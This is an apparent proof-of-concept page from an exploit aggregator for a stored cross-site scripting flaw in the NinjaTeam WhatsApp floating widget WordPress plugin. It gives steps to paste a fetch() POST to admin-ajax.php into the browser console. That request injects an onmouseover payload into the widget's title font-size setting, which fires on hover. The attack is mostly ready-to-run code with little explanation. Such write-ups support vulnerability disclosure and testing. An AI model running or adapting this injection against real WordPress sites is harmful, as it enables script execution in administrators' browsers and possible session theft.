Share
## https://sploitus.com/exploit?id=WPEX-ID:91058C48-F262-4FCC-9390-472D59D61115
1. Navigate to http://vulnerable-site.tld/wp-admin/admin.php?page=nta_whatsapp_floating_widget

2. Paste and run the following in your browser's console:
await fetch("/wp-admin/admin-ajax.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": `title=Start+a+Conversation&isShowBtnLabel=on&btnLabel=Need+Help%3F+%3Cstrong%3EChat+with+us%3C%2Fstrong%3E&btnLabelWidth=156&textColor=%23fff&titleSize=titleSize=18"//'+onmouseover=alert(123)//&descriptionTextSize=12&accountNameSize=14&regularTextSize=11&backgroundColor=%232db742&btnPosition=right&btnLeftDistance=30&btnRightDistance=30&btnBottomDistance=30&isShowPoweredBy=on&scrollHeight=500&responseText=The+team+typically+replies+in+a+few+minutes.&description=Hi!+Click+one+of+our+member+below+to+chat+on+%3Cstrong%3EWhatsApp%3C%2Fstrong%3E&gdprContent=Please+accept+our+%3Ca+href%3D%22https%3A%2F%2Fninjateam.org%2Fprivacy-policy%2F%22%3Eprivacy+policy%3C%2Fa%3E+first+to+start+a+conversation.&time_symbols%5BhourSymbol%5D=h&time_symbols%5BminSymbol%5D=m&showOnDesktop=on&showOnMobile=on&displayCondition=showAllPage&action=njt_wa_save_design_setting&nonce=${njt_wa['nonce']}`,
    "method": "POST",
    "mode": "cors"
});

3. Refresh the page, navigate to the "Design" tab and hover your mouse on Widget Font Size -> Title